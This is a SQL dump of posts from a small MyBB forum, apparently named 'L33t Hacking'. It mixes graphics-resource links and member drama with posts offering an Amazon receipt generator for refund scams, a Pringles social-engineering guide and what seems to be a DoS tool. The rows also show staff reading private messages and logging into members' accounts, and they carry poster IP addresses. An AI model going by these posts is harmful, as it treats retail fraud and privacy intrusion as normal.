[URL=http://stinky666.deviantart.com/art/a-Ang-C4Ds-78159270\"] a.Ang.C4D Pack [/URL]\n- [URL=http://rapidshare.com/files/95648826/vL_C4D_Pack_P1.rar\"] losMac C4D Pack [/URL]\n- [URL=http://www.deviantart.com/download/61826816/Veshy__s_WireFrame_C4D_Pack_by_VeshyDesigns07.rar\"]WireFrame Pack[/URL]\n- [URL=http://www.deviantart.com/download/77148538/C4D_Effect_Pack_by_Lordsiyei.rar\"]Effect C4D pack[/URL] \n- [URL=http://www.deviantart.com/download/40562597/C4D_Pack_1_by_ElementalAlchemist.zip\"]Pack 1[/URL] \n- [URL=http://www.deviantart.com/download/128526593/Pack_c4d_effect_bubbles_by_RoseCabriolet.zip\"]Bubble Effect C4D Pack[/URL] \n- [URL=http://www.deviantart.com/download/36761655/CGFX_c4d_pack1.zip\"]CGFX C4D Pack[/URL] \n- [URL=http://www.deviantart.com/download/28900717/Final_Render_Pack_by_OldManJames.zip\"]C4D Pack2[/URL] \n- [URL=http://www.deviantart.com/download/118621134/MrRobin_abstract_c4d_pack_6_by_MrRoBiN.rar\"]Abstract C4D Pack[/URL] \n- [URL=http://www.deviantart.com/download/89849547/c4d_Supreme_Pack__32_Renders_by_00chaos8.rar\"]Supreme Pack[/URL] [B](New)[/B]\n- [URL=http://www.deviantart.com/download/97557716/Unique_C4D_Pack_by_stinky666.rar\"]Unique C4D Pack[/URL] \n- [URL=http://www.deviantart.com/download/91752059/Tamilias_c4d_Render_by_Tamilia.zip\"]Tamilias C4D Pack[/URL] \n- [URL=http://www.deviantart.com/download/61239702/C4D_Render_Pack_by_Rippie92.zip\"]C4D Pack3[/URL]\n- [URL=http://alieno.deviantart.com/art/Cinema-4D-Exclusive-Pack-81892424\"]C4D Exclusive[/URL]\n- [URL=http://argodream.deviantart.com/art/Abstract-3d-pack-by-argo-32089689\"]Abstract C4D Pack[/URL]\n- [URL=http://mono72.deviantart.com/art/Monochrome-Render-Pack-No-2-68521510\"]Monochrome C4Ds[/URL]\n\n\n[B]Some Good C4D Deviants[/B]\n-[URL=http://mrrobin.deviantart.com/\"]MrRobin[/URL]\n-[URL=http://redfoxgfx.deviantart.com/\"]RedFoxGFX[/URL]\n-[URL=http://jdluxe.deviantart.com/\"]Jdluxe[/URL]\n\n\n[B]Renders/Stocks[/B]\n\n\n- [URL=http://www.renders-graphiques.fr\"]Renders-Graphiques[/URL]\n- [URL=http://www.planetrenders.net\"]Planetrenders[/URL]\n- [URL=http://www.delta-visions.net/forums/index\"]Delta-Visions[/URL]\n- [URL=http://www.photobucket.com/\"]Photobucket[/URL]\n- [URL=http://randomc.net/\"]Randomc[/URL]\n\n\n[B]Renders/Stocks Packs[/B]\n-[URL=http://alpine.brainkiller.be/Resources/stocks_collectedby_delta-visions.com.rar\"]700 Stocks pack[/URL]\n-[URL=http://alpine.brainkiller.be/Renders/Marvel_render_pack_by_delta-visions.rar\"]Marvel Renders Pack[/URL]\n-[URL=http://alpine.brainkiller.be/Resources/Renders_P1_collectedby_delta-visions.com.rar\"]Massive render packs part 1[/URL]\n-[URL=http://alpine.brainkiller.be/Resources/renders_P2_collectedby_delta-visions.com.rar\"] Massive render packs part 2[/URL]\n-[URL=http://alpine.brainkiller.be/Resources/renders_P3_collectedby_delta-visions.com.rar\"] Massive render packs part 3[/URL]\n-[URL=http://www.mediafire.com/download.php?qnzrymnmthz\"]Ownozz! Human stock[/URL]\n-[URL=http://www.mediafire.com/?mymdiiye5xm\"]Revolution recourse render pack[/URL]\n\n\n[B]Brushes[/B]\n-[URL=http://alpine.brainkiller.be/Resources/Brushes_collectedby_delta-visions.com.rar\"]150 brushes pack[/URL]\n\n\n-[URL=http://www.deviantart.com/download/29371497/manga_blood.zip\"]Blood Brush[/URL]\n-[URL=http://www.deviantart.com/download/44218044/1deadpixel___vector_brush_pack_by_1deadpixel.abr\"]Vector Brush[/URL]\n-[URL=http://www.deviantart.com/download/56382366/Brush_Stroke_Brushes_by_genesbuffet.abr\"]Stroke bursh[/URL]\n-[URL=http://www.deviantart.com/download/65889307/Vector_Grunge_Brush_Pack_by_kShinn.jpg\"]Vector Grunge Brush[/URL]\n-[URL=http://www.deviantart.com/download/61824967/MF_Splatter_Brush_Pack_v_01_by_Osiris2735.abr\"]Splatter Brush[/URL]\n-[URL=http://www.deviantart.com/download/83975723/Cloud_Smudge_Brushes_by_Noise_Less.abr\"]Cloud Smudge Brush[/URL]\n-[URL=http://www.deviantart.com/download/71513208/Chilled_smudge_brushes_2_by_served_chilled.abr\"]Chilled smudge set[/URL]', '24.212.197.164', '416597412', '1', '0', '82', '1346093939', '1', '7a013d47b8918911bcf15f4c84c2663d', '0', '1346093939'); INSERT INTO mybb_posts VALUES('1148', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346094126', 'Banned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd6c8f854ec00e16eadba7708ee999504', '0', '0'); INSERT INTO mybb_posts VALUES('1149', '238', '1148', '56', 'RE: Ban the user above you', '0', '2', 'Apathy', '1346095802', '[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\']\r\nBanned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.\r\n[/quote]\r\n\r\nBanned for me not noticin that. So fuck you :)', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'edc10b453656efc81cdc2f6da09fa58d', '0', '0'); INSERT INTO mybb_posts VALUES('1150', '260', '0', '34', 'Afterburn Photoshop Tutorial', '0', '82', 'iTzIpod', '1346095927', '[img]http://img834.imageshack.us/img834/337/tutkl.png[/img]\r\n\r\nCredits: Toxin\r\n\r\n\r\nEnjoy! Good luck on the signature.\r\nPost results below!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a12dfda0ee58edfe108d4b762d7afdd7', '0', '0'); INSERT INTO mybb_posts VALUES('1151', '260', '1150', '34', 'RE: Afterburn Photoshop Tutorial', '0', '2', 'Apathy', '1346096026', 'Image is broken.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '4ed8057f575f312585a6899d5348cc13', '0', '0'); INSERT INTO mybb_posts VALUES('1152', '261', '0', '34', 'Metroid Signature Tutorial', '0', '82', 'iTzIpod', '1346096034', '[img]http://fc00.deviantart.net/fs71/f/2011/292/1/e/tutorial_by_nytelock-d4dapvu.png[/img]\r\n\r\nCredits: Toxin\r\n\r\nPost results below. \r\n\r\nEnjoy\r\n\r\nGood luck!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5ae92908f5dfbb232f208f3db1b7ed5b', '0', '0'); INSERT INTO mybb_posts VALUES('1153', '260', '1151', '34', 'RE: Afterburn Photoshop Tutorial', '0', '82', 'iTzIpod', '1346096112', '[quote=\'Apathy\' pid=\'1151\' dateline=\'1346096026\']\r\nImage is broken.\r\n[/quote]\r\n\r\nNo it\'s not?\r\n\r\nIf it is, just Right click > Open Image In New Tab', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '305bbca64c8730c9f2c1fdc84e988eaf', '0', '0'); INSERT INTO mybb_posts VALUES('1154', '259', '1147', '34', 'RE: Instant\'s GFX Guide', '0', '2', 'Apathy', '1346096172', 'Not bad thanks. Did you put this together?', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'f6405f5803c3c0676338c3242f311325', '0', '0'); INSERT INTO mybb_posts VALUES('1155', '259', '1154', '34', 'RE: Instant\'s GFX Guide', '0', '82', 'iTzIpod', '1346096393', '[quote=\'Apathy\' pid=\'1154\' dateline=\'1346096172\']\r\nNot bad thanks. Did you put this together?\r\n[/quote]\r\n\r\nYeah. But I messed up on the links.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '800b18da5a09cc6fc26a5efa1b917ac2', '0', '0'); INSERT INTO mybb_posts VALUES('1162', '253', '1106', '56', 'RE: Count to 200', '0', '1', 't3h jok3r', '1346101323', '12. Because I like the CSS buttons.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '40e7b65720797213bf2f7dbedd17f268', '0', '0'); INSERT INTO mybb_posts VALUES('1163', '258', '1142', '58', 'RE: Recurring Team now...', '0', '1', 't3h jok3r', '1346101615', 'I\'m kinda good at ripping MyBB themes.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '72121b7f4b67443dc57bd049b15ea71c', '0', '0'); INSERT INTO mybb_posts VALUES('1164', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1346101664', '/me is sad cuz he has too much work to do today.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '60e04198ff2aaeecb9c56df4b878affe', '0', '0'); INSERT INTO mybb_posts VALUES('1157', '238', '1149', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1346096690', '[quote=\'Apathy\' pid=\'1149\' dateline=\'1346095802\']\r\n[quote=\'iTzIpod\' pid=\'1148\' dateline=\'1346094126\']\r\nBanned for not making sense. Also, I was not talking to you. I was talking to t3h jok3r.\r\n[/quote]\r\n\r\nBanned for me not noticin that. So fuck you :)\r\n[/quote]\r\n\r\nDude what\'s with the words? -.-\r\n\r\n\r\nBanned for swearing and spamming thread + breaking rules. (Only post in threads 3 times a day)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f75edf09f66e95b36a9cd5f141ab8d61', '0', '0'); INSERT INTO mybb_posts VALUES('1158', '253', '1106', '56', 'RE: Count to 200', '0', '62', 'R?????zo?', '1346098853', '10. what happens once we reach 200?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8fdc035228536d2f0c6a4758f2e8e3c7', '0', '0'); INSERT INTO mybb_posts VALUES('1159', '256', '1139', '3', 'RE: [Bug] View New Posts', '0', '1', 't3h jok3r', '1346100038', 'Not a bug. That happens when there was no post under a couple of hours. Click on \"View today\'s posts\" to view all the threads that were created or had a new reply under 24 hours.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '946f72826bd068dd7664cbf6ab04d42f', '0', '0'); INSERT INTO mybb_posts VALUES('1160', '240', '1025', '3', 'RE: [Bug] Complaints & Rep Abuse Support', '0', '1', 't3h jok3r', '1346100208', 'Now that\'s a bug. It\'s not suppose to be moderated by Moderators, only by admins.', '41.174.55.45', '699283245', '1', '0', '0', '0', '1', '61bc6a72e10e3f22d24bc5995d234cd9', '0', '0'); INSERT INTO mybb_posts VALUES('1161', '253', '1106', '56', 'RE: Count to 200', '0', '2', 'Apathy', '1346100510', '11 because why not.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '8992b142e8fac7a389779c0a5b70f735', '0', '0'); INSERT INTO mybb_posts VALUES('1165', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1346102149', 'The next number is 13. @Reloadzor, nothing happens. The thread is closed. And it dies.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '05267bb126ca9681332b266b105d3b58', '0', '0'); INSERT INTO mybb_posts VALUES('1166', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346102200', '/me feels t3h jok3r\'s feelings :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '200ab107ee621b13b7f9b1516e88410b', '0', '0'); INSERT INTO mybb_posts VALUES('1167', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1346102417', '/me is mad.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', 'bacbe62b05a76af686289f425c02d2fe', '0', '0'); INSERT INTO mybb_posts VALUES('1168', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346102656', '/me is pissed off.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '110551a08f5aa6921d406c8f9b1c47e6', '0', '0'); INSERT INTO mybb_posts VALUES('1169', '197', '696', '56', 'RE: /me Thread', '0', '2', 'Apathy', '1346102711', '/me is more pissed off.', '173.206.128.176', '-1378975568', '0', '0', '0', '0', '1', '22e5c0378e5f04ad84967b5f39031279', '0', '0'); INSERT INTO mybb_posts VALUES('1170', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1346103907', 'Just type in the url and the port is 80.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'd80ee2eeff370f46be1d9a9596b59cdb', '0', '0'); INSERT INTO mybb_posts VALUES('1171', '262', '0', '43', 'Amazon Receipt Generator V.2', '0', '1', 't3h jok3r', '1346104450', '[align=center]This tool will come in handy to you while SE\'ing Amazon for different products.\r\n\r\n[img]http://i.imgur.com/OyBOU.png[/img]\r\n\r\n[url=http://www.mediafire.com/?53618epamu1n0co][img]http://i.imgur.com/Dni8C.png[/img][/url]\r\n[/align]', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'd115539b7e293bef079e59029bc45479', '0', '0'); INSERT INTO mybb_posts VALUES('1172', '263', '0', '30', 'Emillionforums premium content: Extreme wiki poster', '0', '2', 'Apathy', '1346105023', 'Sales Thread\n\n[quote]http://www.warriorforum.com/warrior-special-offers-forum/526938-extreme-wiki-poster-ultimate-wiki-posting-tool-addons.html[/quote]\n\nDownload\n\n[quote]http://4fastfile.com/abv-fs/2447-1289426460/ewp1.3.2.rar[/quote]\n\n\nA THANK YOU A DAY KEEPS THE DOCTERS AWAY. :)', '173.206.128.176', '-1378975568', '0', '0', '1', '1346117331', '1', '2657a09d5360371fc8ca2461a7eab59b', '0', '1346117331'); INSERT INTO mybb_posts VALUES('1173', '264', '0', '2', 'Something', '0', '1', 't3h jok3r', '1346105024', 'PLEASE DO NOT POST ON THIS THREAD.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '77c9c8375bd4a7a750f37a659e9d2171', '0', '0'); INSERT INTO mybb_posts VALUES('1174', '264', '1173', '2', 'RE: Something', '0', '4', 'Triple H', '1346105078', 'Test, DO NOT report or delete. Thanks.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '764016073f3cc4f1106c27f4e09ef04c', '0', '0'); INSERT INTO mybb_posts VALUES('1175', '264', '1173', '2', 'RE: Something', '0', '5', 'Timmy', '1346105138', 'Test #2, DO NOT report or delete. Thanks.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '3c7c4bf5dc0b9c341617f97f26d8a63b', '0', '0'); INSERT INTO mybb_posts VALUES('1176', '264', '1173', '2', 'RE: Something', '0', '20', 'JakeUS', '1346105203', 'Test by LH Staff, sorry for logging into your account.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', 'a4251462f4628b0f38b658e78557def9', '0', '0'); INSERT INTO mybb_posts VALUES('1177', '264', '1173', '2', 'RE: Something', '0', '82', 'iTzIpod', '1346105292', 'Another test, sorry for logging into your account bro.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '4bbed1d2b59dd2119814df1588b2c2c2', '0', '0'); INSERT INTO mybb_posts VALUES('1178', '113', '286', '15', 'RE: ?Auto Youtube viewer?', '0', '1', 't3h jok3r', '1346106053', 'Anti Virus? I thought this was a YT bot.', '41.174.54.39', '699282983', '1', '0', '0', '0', '1', '878b0897391440ea52306ee206c500c4', '0', '0'); INSERT INTO mybb_posts VALUES('1180', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1346108923', '/me is pissed really pissed off...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69feaa6c1129c1d3e8680b810cd51ee2', '0', '0'); INSERT INTO mybb_posts VALUES('1181', '249', '1097', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1346109013', '[quote=\'Baws\' pid=\'1097\' dateline=\'1346034954\']\r\nno @ an admin close thread, now.\r\n[/quote]\r\n\r\nWhy do you want someone to close the thread? It is only up to 200.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1db5e2b6cc86fb18f3825168ff2762b5', '0', '0'); INSERT INTO mybb_posts VALUES('1182', '247', '1055', '16', 'RE: [Free] [EBook] How to SE Pringles', '0', '82', 'iTzIpod', '1346109303', 'For me, I live in Canada so the tab is called Ask Us. And it works from there. \n\n\nBut I think Kelloggs now owns Pringles. \nI didn\'t write this eBook sorry :/\nI tried it 3 times and got it to work successfully. Sorry guys.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '12fbfd196f49db233e480622f28661e5', '0', '0'); INSERT INTO mybb_posts VALUES('1183', '191', '1170', '15', 'RE: ProDos v1.0', '0', '82', 'iTzIpod', '1346109408', '[quote=\'t3h jok3r\' pid=\'1170\' dateline=\'1346103907\']\r\nJust type in the url and the port is 80.\r\n[/quote]\r\n\r\nOh alright. I will give it a try and will post my results.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4b5af43cb3b9609661434b62bf3cd91d', '0', '0'); INSERT INTO mybb_posts VALUES('1184', '265', '0', '3', 'Apathy Demoted', '0', '1', 't3h jok3r', '1346109820', 'Nevermind.\n\n[color=transparent]I had enough of Apathys BS. I\'m done with Apathy, I will be hiring another Admin soon. \n\nApathy was demoted for reason \"Abuse of Powers\"\n\nMessage to Apathy: I don\'t care now, I thought we were a team and cool friends but I can\'t tolerate your shit anymore. First you said your cool with (Won\'t release name) then you go on fucking around with him. \n\nSecondly, I asked you to promote via usertitle many times, but you viewed the request but didn\'t do shit. Sorry but now I don\'t think you can help me out further. When it also comes to the money you borrowed me for the very first months hosting, I paid you back few weeks ago.\n\nAnd last, I\'m the only admin that has access to a special feature called \"PM LOG\", I can fuckin read, delete, forward any PM via ACP so don\'t you dare thing of lying to me about (won\'t release name).\n\n[/color]', '41.174.59.145', '699284369', '1', '0', '2', '1346641970', '1', '17c0689fc6c0948b49aa437e5c152928', '0', '1346641970'); INSERT INTO mybb_posts VALUES('1185', '265', '1184', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346110374', 'Is that me? \n\nThank God he is demoted. I love you t3h jok3r. I hated him so bad.. \n\nHe made a lot of LQ posts. Such as \" lol yay\" in the 1000 Posts thread and also a bunch of others. I can\'t really think right now..\n\nAnyways. Good luck with this new admin thing. Hopefully it works out fine.\n[hr]\n\n@Sin Cara\nI suggest you not ask for a position. I do remember t3h jok3r say somewhere on this forum that asking for a position will decrease your chances. And he will promote a member he thinks suits the requirements. Also, WWE (RAW) is on right now. I suggest you watch it Sin Cara. ;) Like I said before, t3h jok3r, good luck with this forum and new admin. Hopefully it works out fine ^_^\n\n\nEDIT: Wow Sin Cara you made me look stupid now. Since you deleted your post :/', '24.212.197.164', '416597412', '1', '0', '82', '1346163370', '1', '87b34475690e3849fa6d93af6fa4da33', '0', '1346163370'); INSERT INTO mybb_posts VALUES('1186', '266', '0', '47', 'Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1346111714', 'Hey LH,\r\n\r\nIf you don\'t have any money, you can test your luck and win one of my free Netflix Accounts! :D\r\n\r\nJust simply post here with a number from 1-5 and I will use random.org to choose a number. \r\nI will decide a winner once all the numbers are filled\r\n\r\n\r\nGood Luck everyone!\r\n\r\nRemember to post a number from 1-5.\r\nIf you make multiple accounts, you will get banned or warned for Multi Accounting (Rule #7)\r\n\r\nAnyways, Good Luck to all!\r\n\r\nRequirements: 5+ Posts and at least 1 day registered\r\n\r\n1.\r\n2. sirchamp\r\n3.\r\n4. GRONgamer61\r\n5.', '24.212.197.164', '416597412', '1', '0', '82', '1348932251', '1', '1412ab1b8384de1fb9156553d5e49c04', '0', '1348932251'); INSERT INTO mybb_posts VALUES('2808', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '82', 'iTzIpod', '1348932281', 'Updated thread. It will only be 1-5 not 1-10.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a409a7a5fe1f783623b964eafe16d533', '0', '0'); INSERT INTO mybb_posts VALUES('1187', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1346113631', 'Hey t3h jok3r, \nI would like to request a Usergroup, \n\nApplication:\nName of group: Unique\nGroup Description: We are Unique. We are a HQ Group. And we have the best HQ members. \nGroup Userbar: [img]http://i.imgur.com/cFeJk.png[/img]\nForum Name: Unique Headquarters\nForum Icon(34x34): [img]http://i.imgur.com/CxrW3.png[/img]\nWhy LH should make this group official: LH should make this group official because this group will be an active group with HQ posts. Only LH\'s finest members can join. It is also an invite only group. And we will do giveaways and contests for the community.We will also contribute to the forum and its activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd29a2991688e3cbc189c4318087d9f9d', '0', '0'); INSERT INTO mybb_posts VALUES('1188', '267', '0', '3', '[Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346113934', 'Hey LH, \r\nI would like to thank t3h jok3r for remaking the Userbars. They look great!\r\nAnd also, I would like to announce that L33t Hacking has updated the Userbars and other images. \r\n:D \r\n\r\nThanks t3h jok3r for all your hard work and dedication.\r\n\r\n\r\n\r\nFeel free to edit this thread t3h jok3r.\r\n\r\n[color=#32CD32][b]Edited[/b] by Jok3r[/color]\r\n\r\n[b]Admin[/b]\r\nUsername Color: Red\r\nStar Color: Red\r\n\r\n[b]Staff[/b]\r\nUsername Color: Green\r\nStar Color: Purple\r\n\r\n[b]Mod[/b]\r\nUsername Color: Blue\r\nStar Color: Blue\r\n\r\n[b]Elite[/b]\r\nUsername Color: Orange\r\nStar Color: Orange\r\n\r\n[b]Normal Members[/b]\r\nUsername Color: Grey\r\nStar Color: Yellow\r\n\r\n[b]Custom Groups[/b]\r\nUsername Color: Grey\r\nStar Color: Silver\r\n\r\n[b]Banned[/b]\r\nUsername Color: Black with strike', '24.212.197.164', '416597412', '1', '0', '1', '1346115066', '1', 'ac08463d71da7b70f31c8c7e5f2eef79', '0', '1346115066'); INSERT INTO mybb_posts VALUES('1189', '268', '0', '49', '[Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1346114870', 'In this section, only members part of the News Team can make threads.\r\nAnd these threads inform members of what happened today/week.\r\n\r\nAnd they must make a new thread every week. \r\n\r\nNews Team members must be active and have good grammar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '06051c7f3ab1a0e155af8729f00097fc', '0', '0'); INSERT INTO mybb_posts VALUES('1190', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346115120', 'Thanks for the announcement also the permission to edit the thread.\n\nSo far, I\'m done with the changes. I\'m just trying to make a attractive Admin Userbar.', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', 'f0843cf43921b44fe1a9ef18fdb32e4d', '0', '0'); INSERT INTO mybb_posts VALUES('1191', '267', '1190', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346115283', '[quote=\'t3h jok3r\' pid=\'1190\' dateline=\'1346115120\']\r\nThanks for the announcement also the permission to edit the thread.\r\n\r\nSo far, I\'m done with the changes. I\'m just trying to make a attractive Admin Userbar.\r\n[/quote]\r\n\r\nGood luck with that.\r\n\r\nI wanna have an avatar like yours. :/ But I don\'t know how to make one. So oh well.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1b047f76b6055c58a335587e68e00ef9', '0', '0'); INSERT INTO mybb_posts VALUES('1192', '264', '1173', '2', 'RE: Something', '0', '1', 't3h jok3r', '1346115847', 'Userbar layouts completed. Locked!', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', '72ba9a675722212246ae9956dc552025', '0', '0'); INSERT INTO mybb_posts VALUES('1193', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346115976', 'Thanks. It\'s completed, I don\'t like the icon but I sure do like the text :D\n\nSomeone on HF made me the Avatar', '41.174.59.145', '699284369', '1', '0', '0', '0', '1', 'd2040272225801e55c10bd26ad8446c5', '0', '0'); INSERT INTO mybb_posts VALUES('1194', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '54', 'Sin Cara', '1346116150', 'I think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck!', '196.28.57.72', '-1004783288', '1', '0', '0', '0', '1', 'adbc79438304a175948883d9c21c9f6d', '0', '0'); INSERT INTO mybb_posts VALUES('1195', '267', '1194', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '1', 't3h jok3r', '1346116304', '[quote=\'Sin Cara\' pid=\'1194\' dateline=\'1346116150\']\nI think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck!\n[/quote]\n\nI agree with hiring, I spend too much money with new hosts, DDoS protections, Domain, Theme, Plugins and Advertising so I\'m kinda low on cash. I\'m a [removed] and I earn money online. A lot of people underestimate me because I\'m [removed] but they don\'t know that a Blackhat can do anything.', '41.174.59.145', '699284369', '1', '0', '1', '1346191478', '1', '7a69c1bdbb96c3321d7343aa67dfe570', '0', '1346191478'); INSERT INTO mybb_posts VALUES('1196', '267', '1188', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '54', 'Sin Cara', '1346116518', 'I know GOOD GFX master. He can make unique user bars for just 8$ Paypal. If you interested then PM me admin.', '196.28.57.72', '-1004783288', '1', '0', '54', '1346116636', '1', '9adcc9cec6597f2f91b876480a5ecdec', '0', '1346116636'); INSERT INTO mybb_posts VALUES('1199', '267', '1195', '3', 'RE: [Small Announcement] Userbars/Images Updated', '0', '82', 'iTzIpod', '1346119356', '[quote=\'t3h jok3r\' pid=\'1195\' dateline=\'1346116304\']\n[quote=\'Sin Cara\' pid=\'1194\' dateline=\'1346116150\']\nI think the user bar are good not very good because if admin hire a Gfx master then the user bars will look cool... anyway best of luck!\n[/quote]\n\nI agree with hiring, I spend too much money with new hosts, DDoS protections, Domain, Theme, Plugins and Advertising so I\'m kinda low on cash. I\'m a [removed] and I earn money online. A lot of people underestimate me because I\'m [removed] but they don\'t know that a Blackhat can do anything.\n[/quote]\n\nIsn\'t that too much personal info?\n\n\nAlso @Sin Cara, are you saying t3h jok3r\'s GFX sucks? Or did I misread that...', '24.212.197.164', '416597412', '1', '0', '1', '1346191511', '1', '1437e07124184ca972d6c06864da5c51', '0', '1346191511'); INSERT INTO mybb_posts VALUES('1200', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346122125', 'Well I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is.\n[hr]\nAnd iPod I liked you but whatever.', '173.206.129.78', '-1378975410', '0', '0', '2', '1346122831', '1', 'eeab48ad5bec5870ed2c3b2d8a0869a3', '0', '1346122831'); INSERT INTO mybb_posts VALUES('1201', '268', '1189', '49', 'RE: [Suggestion] Forum News Section', '0', '2', 'Apathy', '1346122894', 'Why would this be needed as there is like 5 active people?', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', 'b5d600db56c2714a601679a5fc6c5250', '0', '0'); INSERT INTO mybb_posts VALUES('1202', '265', '1200', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346123742', '[quote=\'Apathy\' pid=\'1200\' dateline=\'1346122125\']\r\nWell I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is.\r\n[/quote]\r\n\r\n\r\nFriend or not t3h jok3r wants to run a successful forum. He made you an Admin on LH because he trusted you and wanted you to assist him make a successful forum. But you weren\'t taking your job seriously. You disrespected me, you disrespected t3h jok3r, and you disrespected L33t Hacking. You abused your powers. There was a reason why I told you why I didn\'t like you through PM. And there is a reason why t3h jok3r demoted you. In fact, there is a reason for everything. You clearly are making a fool of yourself... It\'s sad enough that we have to deal with this bull crap...\n[hr]\n[quote=\'iTzIpod\' pid=\'1202\' dateline=\'1346123742\']\r\n[quote=\'Apathy\' pid=\'1200\' dateline=\'1346122125\']\r\nWell I guess you do not care about our friendship anymore. I cannot believe my best buddy online would do this to me but I guess it just goes to show how life is.\r\n[/quote]\r\n\r\n\r\nFriend or not t3h jok3r wants to run a successful forum. He made you an Admin on LH because he trusted you and wanted you to assist him make a successful forum. But you weren\'t taking your job seriously. You disrespected me, you disrespected t3h jok3r, and you disrespected L33t Hacking. You abused your powers. There was a reason why I told you why I didn\'t like you through PM. And there is a reason why t3h jok3r demoted you. In fact, there is a reason for everything. You clearly are making a fool of yourself... It\'s sad enough that we have to deal with this bull crap...\r\n[/quote]\r\n\r\nYou liked me? Bitch please stop jerking me around. You never did. I know that for a fact.', '24.212.197.164', '416597412', '1', '0', '82', '1346124041', '1', '7b5c02b57f88a06f400e16e221048dbf', '0', '1346124041'); INSERT INTO mybb_posts VALUES('1203', '268', '1201', '49', 'RE: [Suggestion] Forum News Section', '0', '82', 'iTzIpod', '1346124353', '[quote=\'Apathy\' pid=\'1201\' dateline=\'1346122894\']\r\nWhy would this be needed as there is like 5 active people?\r\n[/quote]\r\n\r\nMaybe for future purposes...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5b5152a8d651b7fe3c56ae395b87261c', '0', '0'); INSERT INTO mybb_posts VALUES('1204', '265', '1184', '3', 'RE: Apathy Demoted', '0', '2', 'Apathy', '1346124597', 'Well liked maybe the wrong term I thought you were a good addition to the forum and you do not know shit about me and joker so shut the fuck up. I honestly only care about what joker has to say. And ito throw away a friendship for a site that has like 7 active people really says something. I am disappointed and that is it.', '173.206.129.78', '-1378975410', '0', '0', '0', '0', '1', '1e7279102adb75b5548e3b665c93826c', '0', '0'); INSERT INTO mybb_posts VALUES('1205', '265', '1204', '3', 'RE: Apathy Demoted', '0', '82', 'iTzIpod', '1346125100', '[quote=\'Apathy\' pid=\'1204\' dateline=\'1346124597\']\r\nI wanna suck your dick. :o\r\n[/quote]\r\n\r\nI know you do! ;)\r\n\r\n\r\n\r\n\r\n\r\nJokes aside.\r\n\r\n\r\n\r\n\r\nI may not know about this so called friendship of yours. But I can tell it came to an end. It is your fault.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9bde566ed5a4dd30c79e239b67fcd583', '0', 